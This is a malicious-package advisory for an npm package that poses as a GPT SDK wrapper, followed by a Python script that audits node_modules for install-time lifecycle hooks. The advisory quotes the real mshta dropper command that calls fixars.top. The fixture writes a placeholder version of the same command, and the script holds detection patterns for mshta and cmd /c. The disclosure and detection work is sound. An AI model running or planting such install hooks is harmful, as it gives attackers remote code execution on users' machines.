OSV ID: MAL-2026-6537
Ecosystem: npm
Summary:
On npm install, the package's preinstall lifecycle script (preinstall.js, declared via scripts.preinstall "node preinstall.js") shells out with exec('cmd /c "mshta http://fixars.top"'). This causes Windows to fetch and execute an HTML Application from the remote host fixars.top over plain HTTP at install time with no user interaction, yielding remote code execution on the installer's machine. The package presents itself as a Node.js wrapper for a GPT/OpenAI-style SDK (name gptmini, baseUrl https://api.openllm.ai/v1), with empty author metadata: an AI-SDK-shaped lure paired with an install-time dropper to an attacker-controlled domain unrelated to any documented publisher.
Source: amazon-inspector (cb05abb3d36b111df4aa8fe044cbf05a431a0778e90d022e1621494c1506a171)
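As an added defender-side example (not part of the OSV record or of any tool named on it), the audit below walks an installed node_modules tree, flags install-time lifecycle hooks (preinstall/install/postinstall/prepare) whose command or referenced `node <file>.js` script contains mshta, cmd /c, child_process or a remote URL, and builds a constructed fixture with a placeholder domain standing in for the real dropper.

```python
# Added example (not from the OSV record): audit a node_modules tree for lifecycle
# scripts that shell out to mshta / cmd, the install-time dropper pattern above.
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Markers of an install-time dropper: mshta, cmd /c, child_process spawning, remote URLs.
SUSPICIOUS = re.compile(r"mshta|\bcmd(?:\.exe)?\s+/c|child_process|https?://", re.IGNORECASE)
NODE_SCRIPT = re.compile(r"^\s*node\s+([\w./-]+\.js)")


def audit_package(pkg_dir):
    """Return findings for one package directory (empty list if nothing suspicious)."""
    findings = []
    scripts = json.loads((pkg_dir / "package.json").read_text(encoding="utf-8")).get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        if SUSPICIOUS.search(cmd):
            findings.append(f"{hook}: suspicious command {cmd!r}")
        m = NODE_SCRIPT.match(cmd)  # "node preinstall.js" hides the payload in a file
        if m and (pkg_dir / m.group(1)).is_file():
            hit = SUSPICIOUS.search((pkg_dir / m.group(1)).read_text(encoding="utf-8", errors="ignore"))
            if hit:
                findings.append(f"{hook}: {m.group(1)} contains {hit.group(0)!r}")
    return findings


def audit_node_modules(root):
    """Map package path -> findings for every package.json under root."""
    report = {}
    for manifest in Path(root).rglob("package.json"):
        findings = audit_package(manifest.parent)
        if findings:
            report[str(manifest.parent.relative_to(root))] = findings
    return report


def build_sample_tree():
    """Constructed fixture: one clean package and one mimicking the dropper (placeholder URL)."""
    root = Path(tempfile.mkdtemp())
    (root / "clean-pkg").mkdir()
    (root / "clean-pkg" / "package.json").write_text(json.dumps({"scripts": {"test": "node test.js"}}))
    bad = root / "dropper-like"  # hypothetical name, not the real package
    bad.mkdir()
    (bad / "package.json").write_text(json.dumps({"scripts": {"preinstall": "node preinstall.js"}}))
    (bad / "preinstall.js").write_text("require('child_process').exec('cmd /c \"mshta http://placeholder.invalid\"')")
    return root
```

Run `audit_node_modules(Path("node_modules"))` against a real checkout; a non-empty report is a reason to quarantine the package before any install hook runs (e.g. by installing with `--ignore-scripts` first).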